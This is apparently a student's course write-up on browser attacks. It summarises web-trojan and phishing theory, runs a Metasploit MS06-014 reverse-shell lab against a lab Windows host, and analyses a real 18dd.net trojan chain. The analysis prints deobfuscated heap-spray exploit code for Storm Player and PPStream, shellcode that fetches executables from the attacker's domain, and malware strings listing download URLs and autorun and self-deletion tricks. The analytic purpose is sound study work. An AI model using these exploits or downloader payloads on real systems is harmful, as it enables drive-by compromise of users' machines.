20199311 2019-2020-2《網絡攻防實踐》第12周做業

問題 回答
這個做業屬於哪一個課程 https://edu.cnblogs.com/campus/besti/19attackdefense
這個做業的要求在哪裏 https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756
我在這個課程的目標是 學習教材第十二章,瞭解Web瀏覽器安全攻防技術的相關知識
這個做業在哪一個具體方面幫助我實現目標 相關知識點和實踐

1. 實踐內容

1.1 Web瀏覽器的技術發展與安全威脅

1.1.1 Web 瀏覽器戰爭與技術發展

  • 現代 Web 瀏覽器的基本結構與機理:現代Web瀏覽器指的是可以符合「現行標準",而且被聯網用戶所接受使用的Web瀏
    覽器軟件。
    圖片描述

1.1.2 Web 瀏覽的安全問題與威脅

Web 瀏覽器做爲目前互聯網時代最爲重要的軟件產品,也正遭遇看咱們在第 10 章中已經介紹過的軟件安全困境三要素的問題,即複雜性、可擴展性和連通性,從而使得 Web 瀏覽器軟件與操做系統等大型系統軟件同樣,面臨着嚴峻的安全問題與挑戰。javascript

  • Web 瀏覽安全威脅位置:
    1. 針對傳輸網絡的網絡協議安全威脅
    2. 針對 Web 瀏覽端系統平臺的安全威脅
    3. 針對 Web 瀏覽器軟件及插件程序的滲透攻擊威脅
    4. 針對互聯網用戶的社會工程學攻擊威脅

圖片描述

1.2 Web瀏覽端的滲透攻擊威脅——網頁木馬

1.2.1 網頁木馬安全機理分析

  • 網頁木馬的定義特性:網頁木馬從本質特性上是利用了現代 Web 瀏覽器軟件中所支持的客戶端腳本執行能力,針對 Web 瀏覽端軟件安全漏洞實施客戶端滲透攻擊, 從而取得在客戶端主機的遠程代碼執行權限來植入惡意程序。
    網頁木馬是對 Web 瀏覽端軟件進行客戶端滲透攻擊的一類惡意移動代碼,一般以網頁腳本語言如 JavaScript、 VBScirpt 實現,或以 Flash、 PDF 等惡意構造的 Web 文件形式存在,經過利用 Web 瀏覽端軟件中存在的安全漏洞,得到客戶端計算機的控制權限以植入惡意程序。php

  • 對網頁木馬機理的全方位分析與理解:與傳統服務器端滲透攻擊能夠主動地進行網絡掃描與攻擊不一樣,網頁木馬的攻擊是被動式的,須要經過一些技術方法來誘使互聯網用戶來訪問網頁木馬頁面。此外在網頁木馬經過滲透攻擊得到客戶端計算機的遠程代碼執行權限以後,爲了進行進一步的主機控制和敏感信息竊取, 通常須要植入一些盜號木馬等類型的惡意程序。所以實施網頁木馬攻擊不像傳統服務器端滲透攻擊那麼簡單,每每涉及較爲複雜的多步驟攻擊場景,並須要多種類型的惡意代碼及網絡資源。使得網頁木馬成爲近年來最爲複雜和難以應對的網絡安全威脅類型的緣由以下html

    1. 多樣化的客戶端滲透攻擊位置和技術類型
    2. 分佈式、複雜的微觀連接結構
    3. 靈活多變的混淆與對抗分析能力

圖片描述

  • 網頁木馬的本質核心一瀏覽器滲透攻擊:網頁木馬的本質核心是利用 Web 瀏覽端軟件安全漏洞的滲透攻擊代碼。java

  • 網頁掛馬機制:在編寫完成網頁木馬滲透攻擊代碼以後,爲了使得可以有終端用戶使用他們可能存在安全漏洞的 Web 瀏覽端軟件來訪問網頁木馬,攻擊者還須要將網頁木馬掛接到一些擁有客戶訪問流量的網站頁面上,而這一過程就被稱爲網頁掛馬。網頁掛馬的機制不少,最主要的有以下四類策略。linux

    1. 內嵌 HTML 標籤:第一類策略使用內嵌 HTML 標籤,如 iframe 、frame 等,將網頁木馬連接嵌入到網站首頁或其餘頁面中。
    2. 惡意 Script 腳本:第二類也是很經常使用的網頁掛馬策略是利用script 腳本標籤經過外部引用腳本的方式來包含網貞木馬, 例如 <script src="URL to Trojan">
    3. 內嵌對象連接:第三類網頁掛馬策略利用圖片、Flash 等內嵌對象中的特定方法來完成指定頁面的加載,如 Flash 中的 LoadMovie() 方法等。
    4. ARP 欺騙掛馬:在以上三類網站掛馬策略基礎上,攻擊者還在使用一種危害度更高的策略——ARP 欺騙掛馬。
  • 混淆機制:除了引入中間跳轉節點進行嵌套連接,並集成多種滲透攻擊代碼以外,網頁木馬攻擊網絡中還每每採用了大量的混淆技術,來對抗反病毒軟件的檢測,並提升反病毒工程師的分析難度,從而使得網頁木馬攻擊網絡更難被檢測和摧毀,這些混淆技術也被稱爲「免殺」。目前在網頁木馬中使用比較普遍的混淆方法中要有ios

    1. 將代碼從新排版,去除縮進、空行、換行、註釋等,同時將網頁木馬中的變量名替換爲一組合法的隨機字符串,使其失去自我描述的能力,從而干擾閱讀分析;
    2. 經過大小寫變換、十六進制編碼、escape 編碼、unicode 編碼等方法對網頁木馬進行編碼混淆;
    3. 經過通用或定製的加密工具對網頁木馬進行加密獲得密文,而後使用腳本語言中包含的解密函數,對密文進行解密,再使用 document.write() 或 eval() 進行動態輸出或執行,此類混淆方法例如 XXTEA 網頁加密工具;
    4. 利用字符串運算、數學運算或特殊函數能夠混淆代碼;
    5. 修改網頁木馬文件掩碼欺騙反病毒軟件,或對網頁木馬文件結構進行混淆,來假裝正常文件,甚至將網頁木馬代碼拆分至多個文件等;

1.2.2 網頁木馬的檢測與分析技術

  • 基於特徵碼匹配的傳統檢測方法:在網頁木馬做爲一種新形態的惡意代碼產生後, 反病毒軟件公司仍延用惡意腳本代碼靜態分析過程來提取出其中具備樣本特異性的特徵碼,而後在線更新手反病毒客戶端軟件中,使用傳統的基於特徵碼檢測方法來嘗試從互聯網用戶上網瀏覽過程當中檢測出網頁木馬。web

  • 基於統計與機器學習的靜態分析方法:爲應對網頁木馬廣泛採用的代碼混淆機制, 研究人員採用了多種統計與機器學習方法對混淆及行爲特徵進行檢測,包括某於判斷矩陣法的網頁惡意腳本檢測方法、基於靜態啓發式規則的檢測方法、基於多異常語義特徵加權的惡意網頁檢測方法以及基於分類算法的混淆惡意腳本檢測方法等。算法

  • 基於動態行爲結果斷定的檢測分析方法:近年來爲應對網頁木馬,最爲有效的一種方式是基於動態行爲結果斷定的檢測分析方法,這種方法利用了網頁木馬在攻擊過程當中向互聯網用戶主機植入並激活惡意程序的行爲特性,經過構建包含典型 Web 訪問瀏覽器及應用軟件、存有安全漏洞的高交互式客戶端蜜罐環境,在蜜罐中訪問待檢測的網頁,根據訪問過程當中是否觸發了新啓動進程、文件系統修改等非預期系統狀態變化,以斷定當前訪問頁面中是否被掛接了網頁木馬。shell

圖片描述

  • 基於模擬瀏覽器環境的動態分析檢測方法:以腳本執行引擎(如 SpiderMonkey 開源 JavaScript 引擎)爲核心,經過模擬實現 DOM 模型頁面解析與渲染、ActiveX 等第三方控件構建出一個虛擬的低交互式客戶端蜜罐環境,在該環境中進行網頁腳本的動態解釋執行,以此還原出網頁木馬在混淆以前的真實形態,並進一步結合反病毒引擎掃描、異常檢測、全漏洞模擬與特徵檢測等方法對網頁木馬進行分析和檢測。

1.2.3 網頁木馬防範措施

應對網貝木馬最根本的防範措施與應對傳統滲透攻擊同樣,就是提高操做系統與瀏覽端平臺軟件的安全性,能夠採用操做系統自己提供的在線更新以及第三方軟件所提供的經常使用應用軟件更新機制,來確保所使用的計算機始終處於一種相對安全的狀態。數據庫

1.3 揭開網絡釣魚的黑幕

網絡釣魚(Phishing)是社會工程學在互聯網中普遍實施的一種典型攻擊方式,經過大量發送聲稱來自於銀行或其餘知名機構的欺騙性垃圾郵件,意圖引誘收信人給出我的敏感信息(如用戶名、口令、帳號ID 、PIN 碼或信用卡詳細信息等)。

1.3.2 網絡釣魚攻擊的技術內幕

  • 網絡釣魚攻擊技術策略:首先釣魚攻擊者須要架設支撐釣角攻擊的底層基礎設施:爲了隱藏自已躲避執法部門的追蹤,他們都是經過從互聯網上尋找被攻陷服務器來搭建釣魚攻擊網絡,他們每每掃描互聯網的 IP 地址空間以尋找潛在的存有漏洞的主機,並攻陷那些缺少有效安全防禦的服務器、甚至我的主機:有了服務器資源以後, 他們就開始在上面架設釣魚網站,包栝假冒各類知名金融機構和在線電子商務網站的前臺假冒釣魚網站,以及後臺用於收集、驗證和發送用戶輸入敏感信息的腳本。在構建完畢釣魚網站以後,釣魚攻擊者極大的挑戰是如何欺騙大量的互聯網用戶訪問釣魚網站,除了技術層面上實施 DNS 中毒攻擊或 Pharming 網絡流量重定向以外,目前更常見的就是經過各類自動化的禮會工程學手段來構造欺騙性垃圾郵件或者信息,來實施撒網式的釣魚攻擊。
    1. 在指向假冒網站的連接中使用 IP 地址代替域名
    2. 註冊發音相近或形似的 DNS 域名
    3. 一個假冒釣魚網站的電子郵件 HTML 內容中嵌入一些指向真實的目標網站連接
    4. 對假冒網站的 URL 進行編碼和混淆
    5. 企圖攻擊用戶網頁瀏覽器存在的漏洞,使之隱藏消息內容的實質
    6. 將假冒的釣魚網站配置成記錄用戶提交的全部數據並進行不可察覺的日誌,而後將用戶重定向到真實的網站。
    7. 架設一個假冒網站, 做爲目標機構真實網站的代理
    8. 經過惡意代碼在受害者計算機上安裝一個惡意的瀏覽器助手工具(Browser Helper Object),而後由其將受害者重定向到假冒的釣魚網站
    9. 使用惡意代碼去修改受害者計算機上的用來維護 DNS 域名和 IP 地址映射的本地
      hosts 文件

1.3.3 網絡釣魚攻擊的防範

  1. 針對網絡釣魚過程當中的電子郵件和即時通訊信息欺詐,應該提升警戒性;
  2. 充分利用瀏覽器軟件、網絡安全廠商軟件所提供的反釣魚網站功能特性;
  3. 在登陸網上銀行、證券基金等關鍵網站進行在線金融操做時,務必要重視防問網站的真實性,不要點擊郵件中的連接來訪問這些網站,最好以直接訪問域名方式來訪問,儘可能使用硬件 U 盾來代替軟證書或口令訪問重要的金融網站;
  4. 最爲重要的是,經過學習和修煉提高本身抵抗社會工程學攻擊的能力。

2. 實踐過程

2.1 動手實踐——Web 瀏覽器滲透攻擊實驗

任務: 使用攻擊機和 Windows 靶機進行瀏覽器滲透攻擊實驗,體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。
所需環境:

  1. 攻擊機: BT4 Linux攻擊機或 Metasploit 滲透攻擊框架軟件;
  2. 靶機:未打補丁的 Windows 靶機,可以使用 Windows 2KS 靶機或 Windows XP 靶機。
    實驗步驟:
  3. 選擇使用 Metasploit 中的 MS06-014 滲透攻擊模塊 (ie_createobject) ;
  4. 選擇 PAYLOAD 爲任意遠程 Shell 鏈接;
  5. 設置服務器地址(SVRHOST或LHOST)和 URL 參數,運行exploit,構造出惡意
    網頁木馬腳本:
  6. 在靶機環境中啓動瀏覽器,驗證與服務器的連通性,並訪問惡意網頁木馬腳木 URL;
  7. 在攻擊機的 Metasploit 軟件中查看滲透攻擊狀態,並經過成功滲透攻擊後創建起的遠桯控制會話 SESSION, 在靶機上遠程執行命令。

本次實驗所使用的攻擊機爲 kail linux,靶機爲 Windows 2KS,ip 地址以下表所示

主機名稱 ip地址
kail 192.168.200.10
windows 2ks 192.168.200.124

這裏利用的是 MS06-014 漏洞,該漏洞爲 Windows 的 RDS.Dataspace ActiveX 實現上存在漏洞,遠程攻擊者可能利用此漏洞在獲取主機的控制。在某些狀況下,MDAC 所捆綁的 RDS.Dataspace ActiveX 控件沒法確保可以進行安全的交互,致使遠程代碼執行漏洞,成功利用這個漏洞的攻擊者能夠徹底控制受影響的系統。

首先打開 msfconsole ,搜索這個漏洞
圖片描述
選擇漏洞,搜索可用載荷
圖片描述
選擇第50號載荷 windows/meterpreter/reverse_tcp,設置載荷,使用show options查看所須要配置的項
圖片描述
設置服務器地址LHOST爲攻擊機地址192.168.200.10,expilot運行
圖片描述
能夠看到惡意木馬腳本構形成功,而且生成了一個 URL http://192.168.200.10:8080/WSR0TBBr
接下來打開靶機,在靶機上 ping 服務器,發現能夠 ping 通,說明與服務器連通性正常
圖片描述
而後打開瀏覽器,訪問http://192.168.200.10:8080/WSR0TBBr
圖片描述
回到攻擊機,能夠看到攻擊機與靶機創建了一個 session 對話
圖片描述
這表明咱們在靶機上成功的得到了 Meterpreter 的 Shell
而後使用命令sessions -l查看咱們控制的主機
圖片描述
使用命令sessions -i 1選擇控制咱們攻陷的靶機,並經過ipconfig命令查看靶機的ip地址
圖片描述
能夠看到與在靶機上查看到ip地址的一致
圖片描述
至此實驗完成

2.2 取證分析實踐: 剖析一個實際的網頁木馬攻擊場景

案例分析挑戰內容: 2007 年 10 月,北京大學計算機科學技術研究所信息安全工程研究中心蜜網課題組的成員在進行分析中國萬維網掛乃網站的採樣分析時, 發現了 個域名爲 I8dd.net 的龐大的木馬宿主站點。 在連接分析的過程當中, 發現有大量惡意網頁最終都重定向到了這個站點上,這在所有的宿主站點中排名第一。 進一步的研究分析代表, 這個站點的惡意代碼入口是 http://aa.l8dd.net/ww/new09.htm文件。 如今你的任務是根據給出的說明逐步分析, 獲得最終的木馬文件的內容。
這個掛馬網站如今已經沒法訪問了, 但蜜網課題組的成員保留了最初作分析時所們的原始文件。首先你應該訪問 start.html,在這個文件中給出了 new09.htm 的地址, 在進入 new09.htm 後, 每解密出一個文件地址, 請對其做 32 位 MD5 散列,以散列值爲文件名到http://netsec.ccet1.ed.enu/hacking/目錄(或者附偌資料中的解壓縮數據目錄)下去下載對應的文件(注意: 文件名中的英文字母爲小寫, 且沒有擴展名),即爲解密出的地址對應的文件。若是解密出的地址給出的是網頁或腳本文件,請繼續解密;若是解密出的地址是二進制程序文件,請進行靜態反彙編或動態調試。重複以上過程直到這些文件被所有分析完成。請注意:被散列的文件地址應該是標準的 URL 形式, 形如http://xxl8dd.net/a/b.htm,不然會致使散列值計算不正確而沒法繼續。
問題:

  1. 試述你是如何一步步地從所給的網頁中獲取最後的真實代碼的?
  2. 網頁和 JavaScript 代碼中都使用了什麼樣的加密方法?你是如何解密的?
  3. 從解密後的結果來看,攻擊者構造的網頁木馬利用了哪些安全漏洞?
  4. 解密後發現了多少個可執行文件?這些可執行文件中有下載器麼?若是有,它們下載了哪些程序?這些程序又是起什麼做用的?(請舉例分析)

分析過程

因爲題目中所給的 URL http://192.168.68.253/scom/start.html沒法打開也沒法下載(所給資料中也沒有),那麼就沒法找到 new09.htm 文件,固然也沒法進行下一步分析,不得已只好按照指導書進行下面的內容

打開 new09.htm 咱們能夠獲得兩個連接http://aa.18dd.net/aa/kl.htm http://js.users.51.la/1299644.js,分別計算它們的MD5值
圖片描述

圖片描述
分別爲7f60672dcd6b5e90b6772545ee219bd323180a42a2ff1192150231b44ffdf3d3,從老師所給資料中的hashed文件夾中找到這兩個文件
圖片描述
能夠發現第一個文件有11kb,第二個文件不到1kb,先看第二個文件
圖片描述
這顯然不是咱們所須要的內容,那麼打開第一個文件
圖片描述
由倒數第三行t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));咱們知道這個文件使用了一種
被稱爲 XXTEA+Base64 的加密方法,對付這種加密方法,咱們只要找到它的加密密鑰便可。固然這個xxtea_decrypt函數的第二個參數就是密鑰,不過也是被加密過的,可是僅僅是一種16進制加密。轉換一下便可獲得密鑰
圖片描述
能夠看到密鑰爲script
指導書中所給的 xxtea 在線解密網站已經不能用了,這裏能夠用xxtea在線解密網站來解密,輸入密文和密鑰,點擊解密,便可獲得結果
圖片描述

圖片描述

這裏加密者又用到了另外一種加密方式,也就是十六進制加密,對引號內的內容解密,獲得以下結果,將結果保存
圖片描述

圖片描述

分析這段代碼,能夠看到它利用了應用程序漏洞有「Adodb.Stream」、「MPS.StormPlayer」、「POWERPLAYER.PowerPlayerCtrl.1」和「BaiduBar.Tool」,分別對應利用了微軟數據庫訪問對象、暴風影音、PPStream 和百度搜霸的漏洞。
另外,這個文件還引用三個 js 文件和一個壓縮包(bd.cab,解開後是bd.exe)
根據分析結果,對http://aa.18dd.net/aa/1.jshttp://aa.18dd.net/aa/b.jshttp://aa.18dd.net/aa/pps.jshttp://down.18dd.net/bb/bd.cab做處理
一樣計算md5的值,過程同上,能夠分別獲得它們的MD5值

連接 MD5值
http://aa.18dd.net/aa/1.js 5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js 3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js 5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab 1c1d7b3539a617517c49eee4120783b2

同理,到hashed文件夾中找到這四個文件,保存
圖片描述
首先來看1.js也就是 5d7e9058a857aa2abee820d5473c5fa4
圖片描述
仍是一個十六進制加密,解開可得
圖片描述

圖片描述
這個文件前面部分下載了一個http://down.18dd.net/bb/014.exe的可執行文件,後面部分則是對ADODB漏洞的繼續利用。
先將這個exe文件放到一邊,咱們先來看b.js,也就是3870c28cc279d457746b3796a262f166文件
圖片描述
這段代碼看起來讓人至關頭痛,不過好在第一行的函數的參數(p,a,c,k,e,d)給了咱們提示,連起來是「packed」。上網搜索,這實際上是一個混淆工具。下面咱們在這個網站在線js美化來還原代碼
圖片描述
還原後的代碼以下所示

var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)

這裏出現了關鍵字 shellcode ,是二進制的機器碼,下面分析這個 shellcode
這個 shellcode 並不長,但它要實現不少破壞,不可能把全部的病毒都寫在裏面。所以它極可能就是下載器。對於一個下載器來講,必不可少的一項內容就是要下載的內容的 URL,咱們能夠找一找這加密的代碼裏有 URL 特徵的字符串。
URL 中必然會出現的斜線//的十六進制 ASCII 碼是2F,那麼咱們就在這段shellcode 中找/。查找結果以下(高亮處)
圖片描述
這裏能夠看到後四個2f比較密集,很可疑。那麼咱們取第三個2f到末尾的內容
(這裏指導書上給的解密工具一樣不能用了,能夠採用 FreShow 和16進制轉換結合解密)
圖片描述

圖片描述
能夠獲得一個不徹底的網址://down.18dd.net/bb/bf.exe,將它補充完整http://down.18dd.net/bb/bf.exe
又是一個可執行文件,先放一放。看下一個 js 文件 pps.js ,也就是5f0b8bf0385314dbe0e5ec95e6abedc2文件,打開查看
圖片描述
此次變成了八進制轉換,解密,結果以下

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

一樣是 shellcode ,與上述過程同理,能夠解密出以下 URL http://down.18dd.net/bb/pps.exe
最後一個壓縮文件將其解壓縮,能夠獲得bd.exe執行文件,計算將前三個可執行文件的 URL 的 MD5 值,以下表所示

連接 MD5值
http://down.18dd.net/bb/014.exe ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe ff59b3b8961f502289c1b4df8c37e2a4

因而咱們有了四個可執行文件,即 014.exe,bf.exe,pps.exe,bd.exe,將其保存會發現,這四個文件的大小是相同的
圖片描述
校驗這四個文件的 MD5 值,會發現竟然是相同的(1290ecd734d68d52318ea9016dc6fe63)
圖片描述
結合上述分析,說明這四個可執行文件是相同的,那麼分析其中一個就能夠了,下面就是咱們前面實驗所作過的分析一個病毒程序了,那麼按照流程,咱們先來檢驗它是否加殼,這裏使用 peid 工具
圖片描述
能夠看到這個程序是由 Delphi 寫得,同時可使用 DeDe 來驗證一下
圖片描述
果不其然是這樣,接下來使用反彙編工具 W32DAsm 反彙編這個程序,首先來看一下字符串(這裏沒有辦法放大,只好把它複製出來)
圖片描述

" goto try"
"#32770"
"(T@"
",T@"
".1"
":\AutoRun.inf"
":try"
"[AutoRun]
open="
"\program files\internet explorer\IEXPLORE.EXE"
"0813"
"3爛怱VQ嬝媠咑u3離&j"
"60000"
"advapi32.dll"
"Alletdel.bat"
"AutoRun.inf"
"Button"
"ChangeServiceConfig2A"
"ChangeServiceConfig2W"
"cmd /c date "
"cmd /c date 1981-01-12"
"del ""
"del %0"
"drivers/klif.sys"
"Error"
"FPUMaskValue"
"http://down.18dd.net/kl/0.exe"
"http://down.18dd.net/kl/1.exe"
"http://down.18dd.net/kl/10.exe"
"http://down.18dd.net/kl/11.exe"
"http://down.18dd.net/kl/12.exe"
"http://down.18dd.net/kl/13.exe"
"http://down.18dd.net/kl/14.exe"
"http://down.18dd.net/kl/15.exe"
"http://down.18dd.net/kl/16.exe"
"http://down.18dd.net/kl/17.exe"
"http://down.18dd.net/kl/18.exe"
"http://down.18dd.net/kl/19.exe"
"http://down.18dd.net/kl/2.exe"
"http://down.18dd.net/kl/3.exe"
"http://down.18dd.net/kl/4.exe"
"http://down.18dd.net/kl/5.exe"
"http://down.18dd.net/kl/6.exe"
"http://down.18dd.net/kl/7.exe"
"http://down.18dd.net/kl/8.exe"
"http://down.18dd.net/kl/9.exe"
"IE 執行保護"
"IEXPLORE.EXE"
"IE執行保護"
"if exist ""
"Kernel32.dll"
"NoDriveTypeAutoRun"
"ntdll.dll"
"QueryServiceConfig2A"
"QueryServiceConfig2W"
"S@"
"serdst.exe"
"shell\Auto\command="
"shellexecute="
"SOFTWARE\Borland\Delphi\RTL"
"Software\Microsoft\Windows\CurrentVersion\Poli"
"Telephotsgoogle"
"U嬱兡餝VW3繳h訹@"
"U嬱筧"
"U嬱伳SVW?"
"ZwUnmapViewOfSection"
"刌@"
"銼@"
"婦$鰼"
"媩$(?"
"燬@"
"擮@"
"肯定"
"媆$?搡?婼婥t?燖"
"瑞星卡卡上網安全助手 - IE防漏牆"
"爲即插即用設備提供支持"
"圷@"
"容許"
"容許執行"

分析這些字符串:

  1. 由字符串" goto try",":try","Alletdel.bat","cmd /c date ","cmd /c date 1981-01-12","del "","del %0","if exist ",猜想這個程序可能生成一個叫"Alletdel.bat"的批處理文件,這個文件中有一個標籤叫"try",批處理文件會不斷的執行這個標籤下一行的命令,命令內容多是判斷文件存在性,更改系統日期,刪除某些文件
  2. 由":\AutoRun.inf","[AutoRun] open=","AutoRun.inf","shell\Auto\command=",猜想這個程序可能在磁盤根目錄下生成自動運行的文件,以使得用戶在不當心時啓動程序
  3. 由"advapi32.dll","drivers/klif.sys","\program files\internet explorer\IEXPLORE.EXE","IE 執行保護","IEXPLORE.EXE","Software\Microsoft\Windows\CurrentVersion\Poli","Kernel32.dll","SOFTWARE\Borland\Delphi\RTL","ChangeServiceConfig2A","ChangeServiceConfig2W","QueryServiceConfig2A","QueryServiceConfig2W"等能夠猜想程序可能會
    修改IE、註冊表、服務和系統文件
  4. 由"瑞星卡卡上網安全助手 - IE防漏牆","容許","容許執行",可知這個程序有必定的防系統保護軟件的能力,
  5. 由20個可執行文件的 URL 猜想程序要下載一大堆木馬
  6. 由「爲即插即用設備提供支持」可知要創建服務

下面動態分析這個程序,使用的監視工具爲 Process Monitor、SysInspector、Total Uninstall
首先使用 SysInspector 生成運行程序前的系統日誌,運行 bd.exe 以後,再次生成一個系統日誌,而後點比較日誌,能夠獲得以下結果
圖片描述

圖片描述

能夠看到有兩處變化

  1. 在系統文件夾(system32)下建立了一個 serdst.exe 的文件。經MD5檢查,該文件就是這個可執行文件。
  2. 安裝了一個服務。服務名爲「Wdswsdewn」,顯示名爲"Telephotsgoogle"

不過在服務創建後並無什麼事情發生......,我的猜想是下載器(bd.exe)中的 URL 已經失效了,不過好在資料中給出了這 20 個執行文件,咱們能夠直接在這裏分析

以4.exe爲例,一樣重複上述步驟,首先使用 W32Dasm 反彙編,查看字符串,獲得以下結果

""
"" goto Loop
del %0
"
"" -r -a -s -h
del ""
""
if exist ""
"%d"
".bat"
".mod"
":Loop
"
"@echo off
"
"\"
"\InprocServer32"
"^B*"
"{28907901-1416-3389"
"1"
"-9981-372178569982}"
"a"
"Apartment"
"asktao"
"attrib ""
"C:\DFD"
"CLSID\"
"EnHookWindow"
"enweafx.fon"
"Fonts\"
"id.exe"
"kawdacs.dll"
"kawdazy.d"
"kawdbaz.exe"
"kawdbzy.dll"
"ll"
"MP3"
"Music"
"q@ı"
"Send"
"Software\Microsoft\Windows\CurrentVersion\expl"
"S鐻?吚t嬝覽?
"ThreadingModel"
"Url%d"
"Url1"
"U嬱S瑙?嬝杓錏?+?? "
"vercls"
"wddpri.d"
"獲ı"
"嬂%Q@"

從上面很難推出不少信息,主要能夠看到這個病毒可能要生成一個批處理文件並進行刪除文件操做,由於"goto Loop del %0"," -r -a -s –h del ","if exist ", ":Loop","@echo off","attrib ""這些內容都是批處理文件中的字符串。同時其中還有ClassID 標識、註冊表鍵值和一些文件名。

接下來使用 SysInspector 進行動態分析,先生成程序運行前的日誌,程序運行後再生成一份日誌,將其比較,查看結果
圖片描述
生成了一些文件,包括kawdbaz.exe,kawdbzy.dll等,同時刪除了verclsid.exe
更改了一些註冊表項目,主要是設置了一個鉤子,加載了一個啓動DLL,另外把Windows的自動更新功能給禁用了。
能夠看到這個程序給 explorer.exe 程序和中被注入了動態連接庫 kawdbzy.dll。而實際上,除了病毒的主程序文件 kawdbaz.exe 的進程外,Process Monitor、vmtool、SysInspector本身的進程中都被注入了該DLL。
